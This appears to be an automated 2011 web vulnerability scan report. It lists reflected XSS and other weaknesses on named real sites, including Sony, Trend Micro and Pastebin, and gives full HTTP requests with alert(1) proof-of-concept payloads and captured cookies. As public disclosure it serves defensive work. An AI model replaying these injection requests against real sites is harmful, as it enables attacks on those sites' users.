XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09072011-03

Report generated by XSS.CX at Wed Sep 07 14:16:34 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. http://blog.trendmicro.com/ [s parameter]

1.2. http://display.digitalriver.com/ [aid parameter]

1.3. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

1.4. http://display.digitalriver.com/ [tax parameter]

1.5. http://pastebin.com/bq8xJPMn [REST URL parameter 1]

1.6. http://pastebin.com/bq8xJPMn [name of an arbitrarily supplied request parameter]

1.7. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 1]

1.8. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 2]

1.9. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 3]

1.10. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 4]

1.11. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 1]

1.12. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 2]

1.13. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 3]

1.14. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 4]

1.15. http://pastebin.com/etc/social/index.html [REST URL parameter 1]

1.16. http://pastebin.com/etc/social/index.html [REST URL parameter 2]

1.17. http://pastebin.com/etc/social/index.html [REST URL parameter 3]

1.18. http://pastebin.com/favicon.ico [REST URL parameter 1]

1.19. http://pastebin.com/i/fixed.css [REST URL parameter 1]

1.20. http://pastebin.com/i/fixed.css [REST URL parameter 2]

1.21. http://pastebin.com/i/style.css [REST URL parameter 1]

1.22. http://pastebin.com/i/style.css [REST URL parameter 2]

1.23. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 1]

1.24. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 2]

1.25. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntk parameter]

1.26. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]

1.27. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]

1.28. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [name of an arbitrarily supplied request parameter]

1.29. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [x parameter]

1.30. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [y parameter]

1.31. https://store.trendmicro.com/DRHM/store [name of an arbitrarily supplied request parameter]

1.32. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452524 parameter]

1.33. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452525 parameter]

1.34. http://wd.sharethis.com/api/getCount2.php [cb parameter]

1.35. http://webconnect.sendouts.com/candidate/my-profile.aspx [Group parameter]

1.36. http://webconnect.sendouts.com/forgot-login.aspx [Group parameter]

1.37. http://webconnect.sendouts.com/job-search.aspx [Group parameter]

1.38. http://webconnect.sendouts.com/login.aspx [Group parameter]

1.39. https://www.ca.com/us/register/login.aspx [returnURL parameter]

1.40. http://www.javalobby.org/articles/acegisecurity/part1.jsp [name of an arbitrarily supplied request parameter]

1.41. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [cmd parameter]

1.42. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [dialogID parameter]

1.43. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docType parameter]

1.44. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docTypeID parameter]

1.45. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [name of an arbitrarily supplied request parameter]

1.46. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]

1.47. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [sliceId parameter]

1.48. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [stateId parameter]

1.49. http://www.typepad.com/services/toolbar [autofollowed parameter]

2. Flash cross-domain policy

2.1. http://www.viddler.com/crossdomain.xml

2.2. http://blog.trendmicro.com/crossdomain.xml

2.3. http://wd.sharethis.com/crossdomain.xml

2.4. http://www.typepad.com/crossdomain.xml

3. Cleartext submission of password

3.1. http://webconnect.sendouts.com/login.aspx

3.2. http://www.javalobby.org/articles/acegisecurity/part1.jsp

3.3. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

4. Session token in URL

4.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay

4.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

4.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

4.4. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

5. Password field submitted using GET method

6. ASP.NET ViewState without MAC enabled

6.1. http://webconnect.sendouts.com/forgot-login.aspx

6.2. http://webconnect.sendouts.com/job-search.aspx

6.3. http://webconnect.sendouts.com/login.aspx

7. Cookie without HttpOnly flag set

7.1. http://www.kb.sony.com/

7.2. http://www.kb.sony.com/selfservice/closeviewdocument.do

7.3. http://www.kb.sony.com/selfservice/common/extIFrame.jsp

7.4. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp

7.5. http://www.kb.sony.com/selfservice/common/viewdocument_appHeader.jsp

7.6. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Metadata.jsp

7.7. http://www.kb.sony.com/selfservice/getUMBrowseImageById.do

7.8. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/

7.9. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg

7.10. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg

7.11. http://store.sony.com/webapp/wcs/stores/servlet/SYErrorRedirect

7.12. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax

7.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

7.14. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js

7.15. https://www.ca.com/siteminderagent/forms/login.fcc

7.16. https://www.ca.com/us/register/login.aspx

8. Password field with autocomplete enabled

8.1. http://webconnect.sendouts.com/login.aspx

8.2. https://www.ca.com/us/register/createprofile.aspx

8.3. https://www.ca.com/us/register/login.aspx

8.4. https://www.ca.com/us/register/login.aspx

8.5. https://www.ca.com/us/register/login.aspx

8.6. https://www.ca.com/us/register/login.aspx

8.7. https://www.ca.com/us/register/login.aspx

8.8. http://www.javalobby.org/articles/acegisecurity/part1.jsp

8.9. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

9. Referer-dependent response

9.1. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

9.2. http://www.viddler.com/embed/dca1712/

9.3. http://www.viddler.com/player/dca1712/0

10. SSL cookie without secure flag set

10.1. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js

10.2. https://www.ca.com/siteminderagent/forms/login.fcc

10.3. https://www.ca.com/us/register/login.aspx

11. Cookie scoped to parent domain

11.1. https://www.ca.com/siteminderagent/forms/login.fcc

11.2. https://www.ca.com/us/register/login.aspx

12. Cross-domain Referer leakage

12.1. http://blog.trendmicro.com/

12.2. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js

12.3. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay

12.4. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

12.5. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

12.6. https://store.trendmicro.com/DRHM/store

12.7. https://store.trendmicro.com/store

12.8. https://www.ca.com/us/register/createprofile.aspx

12.9. https://www.ca.com/us/register/login.aspx

12.10. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp

12.11. http://www.kb.sony.com/selfservice/microsites/search.do

12.12. http://www.kb.sony.com/selfservice/microsites/searchEntry.do

13. Cross-domain script include

13.1. http://blog.trendmicro.com/

13.2. http://blog.trendmicro.com/a-snapshot-of-android-threats-infographic/

13.3. http://blog.trendmicro.com/blackhat-2011-dangers-of-embedded-web-servers/

13.4. http://blog.trendmicro.com/category/exploits/

13.5. http://blog.trendmicro.com/category/pharming/

13.6. http://blog.trendmicro.com/trend-micro-researchers-identify-vulnerability-in-hotmail/

13.7. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js

13.8. http://pastebin.com/bq8xJPMn

13.9. http://pastebin.com/etc/ads/iframes/160x600.html

13.10. http://pastebin.com/etc/ads/iframes/728x90.html

13.11. http://pastebin.com/etc/social/index.html

13.12. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay

13.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

13.14. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

13.15. https://store.trendmicro.com/DRHM/store

13.16. https://store.trendmicro.com/store

13.17. https://www.ca.com/us/register/createprofile.aspx

13.18. https://www.ca.com/us/register/forgotpassword.aspx

13.19. https://www.ca.com/us/register/login.aspx

13.20. http://www.javalobby.org/articles/acegisecurity/part1.jsp

13.21. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

14. TRACE method is enabled

15. Email addresses disclosed

15.1. http://blog.trendmicro.com/wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js

15.2. http://pastebin.com/bq8xJPMn

15.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

15.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

15.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

15.6. https://www.ca.com/us/register/createprofile.aspx

15.7. https://www.ca.com/us/register/forgotpassword.aspx

15.8. https://www.ca.com/us/register/login.aspx

15.9. http://www.kb.sony.com/selfservice/jslib/CalendarPopup.js

16. Private IP addresses disclosed

16.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

16.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js

16.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js

16.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js

16.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js

17. Robots.txt file

17.1. http://blog.trendmicro.com/

17.2. http://display.digitalriver.com/

17.3. http://pastebin.com/i/fixed.css

17.4. https://store.trendmicro.com/store

17.5. http://www.javalobby.org/articles/acegisecurity/part1.jsp

17.6. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

17.7. http://www.viddler.com/embed/dca1712/

18. Cacheable HTTPS response

19. HTML does not specify charset

19.1. http://display.digitalriver.com/

19.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax

19.3. http://wd.sharethis.com/api/getCount2.php

19.4. http://www.kb.sony.com/selfservice/common/bg_323232.html

20. Content type incorrectly stated

20.1. http://display.digitalriver.com/

20.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax

20.3. https://store.trendmicro.com/favicon.ico

20.4. http://wd.sharethis.com/api/getCount2.php

20.5. https://www.ca.com/images/icons/checkmark.gif

20.6. http://www.javaworld.com/favicon.ico

21. Content type is not specified

21.1. http://www.javalobby.org/favicon.ico

21.2. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/6/DT_MICROSOFTKB_1_1

21.3. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/600/DT_KNOWLEDGEARTICLES_1_1

21.4. http://www.kb.sony.com/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1

22. SSL certificate

22.1. https://store.trendmicro.com/

22.2. https://www.ca.com/



1. Cross-site scripting (reflected)  next
There are 49 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://blog.trendmicro.com/ [s parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /

Issue detail

The value of the s request parameter is copied into the HTML document as plain text between tags. The payload 60122<script>alert(1)</script>7e9986f3a17 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=xss60122<script>alert(1)</script>7e9986f3a17&Submit=+Go+ HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/category/exploits/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.3.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=3; bn_u=6923713914570485926; cmRS=&t1=1315351005853&t2=1315351007808&t3=-1&t4=1315351004379&fti=1315351012197&fn=UNDEFINED%3A0%3B&ac=0:S&fd=0%3A1%3ASubmit%3B0%3A0%3As%3B&uer=&fu=/&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/category/exploits/&rf=http%3A//blog.trendmicro.com/a-snapshot-of-android-threats-infographic/

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
X-Varnish: 1696292975
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:17:33 GMT
Date: Tue, 06 Sep 2011 18:17:33 GMT
Content-Length: 39428
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</a> &gt; Search Results for xss60122<script>alert(1)</script>7e9986f3a17<br />
...[SNIP]...

1.2. http://display.digitalriver.com/ [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6c82'-alert(1)-'417cdac0750 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244a6c82'-alert(1)-'417cdac0750&tax=trend_micro HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 18:13:06 GMT
Server: Apache/2.2.9
Expires: Tue, 06 Sep 2011 18:43:06 GMT
Last-Modified: Tue, 06 Sep 2011 18:13:06 GMT
Content-Length: 234
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244a6c82'-alert(1)-'417cdac0750&tax=trend_micro';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.3. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a55b'-alert(1)-'0024805587a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=trend_micro&8a55b'-alert(1)-'0024805587a=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 18:13:08 GMT
Server: Apache/2.2.9
Expires: Tue, 06 Sep 2011 18:43:08 GMT
Last-Modified: Tue, 06 Sep 2011 18:13:08 GMT
Content-Length: 237
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro&8a55b'-alert(1)-'0024805587a=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.4. http://display.digitalriver.com/ [tax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76aea'-alert(1)-'2f2fe981849 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=trend_micro76aea'-alert(1)-'2f2fe981849 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 18:13:07 GMT
Server: Apache/2.2.9
Expires: Tue, 06 Sep 2011 18:43:07 GMT
Last-Modified: Tue, 06 Sep 2011 18:13:07 GMT
Content-Length: 234
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro76aea'-alert(1)-'2f2fe981849';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.5. http://pastebin.com/bq8xJPMn [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /bq8xJPMn

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bda"><script>alert(1)</script>e6654f051f5 was submitted in the REST URL parameter 1. This input was echoed as 75bda\"><script>alert(1)</script>e6654f051f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bq8xJPMn75bda"><script>alert(1)</script>e6654f051f5 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=24; expires=Tue, 04-Oct-2011 18:10:40 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/bq8xJPMn75bda\"><script>alert(1)</script>e6654f051f5"/>
...[SNIP]...

1.6. http://pastebin.com/bq8xJPMn [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /bq8xJPMn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba897"><script>alert(1)</script>b386f4c98c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba897\"><script>alert(1)</script>b386f4c98c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bq8xJPMn?ba897"><script>alert(1)</script>b386f4c98c8=1 HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=22; expires=Tue, 04-Oct-2011 18:10:40 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/bq8xJPMn?ba897\"><script>alert(1)</script>b386f4c98c8=1"/>
...[SNIP]...

1.7. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/160x600.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd4be"><script>alert(1)</script>1b7c01d5428 was submitted in the REST URL parameter 1. This input was echoed as fd4be\"><script>alert(1)</script>1b7c01d5428 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /etcfd4be"><script>alert(1)</script>1b7c01d5428/ads/iframes/160x600.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=17; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/etcfd4be\"><script>alert(1)</script>1b7c01d5428/ads/iframes/160x600.html"/>
...[SNIP]...

1.8. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/160x600.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca1b0"><script>alert(1)</script>e6b4ca5c2bf was submitted in the REST URL parameter 2. This input was echoed as ca1b0\"><script>alert(1)</script>e6b4ca5c2bf in the application's response.

